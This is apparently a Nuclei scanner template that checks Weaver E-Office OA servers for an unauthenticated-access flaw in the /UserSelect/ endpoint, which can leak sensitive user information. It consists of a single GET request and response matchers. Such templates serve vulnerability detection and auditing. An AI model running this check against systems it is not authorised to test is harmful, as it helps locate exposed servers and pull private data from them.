id: EOffice_UserSelect_unauth
info:
  name: 泛微OA E-Office UserSelect 未授权访问漏洞
  author: mhb17
  severity: medium
  description: 泛微OA E-Office UserSelect接口存在未授权访问漏洞，通过漏洞攻击者可以获取敏感信息
  reference:
    - https://peiqi.wgpsec.org/wiki/oa/%E6%B3%9B%E5%BE%AEOA/%E6%B3%9B%E5%BE%AEOA%20E-Office%20UserSelect%20%E6%9C%AA%E6%8E%88%E6%9D%83%E8%AE%BF%E9%97%AE%E6%BC%8F%E6%B4%9E.html
  tags: informationleak
requests:
  - raw:
      - |+
        GET /UserSelect/ HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.5414.120 Safari/537.36
        Connection: close

    matchers-condition: and
    matchers:
      - type: binary
        part: body
        binary:
          - e98089e6
      - type: word
        part: header
        words:
          - '200'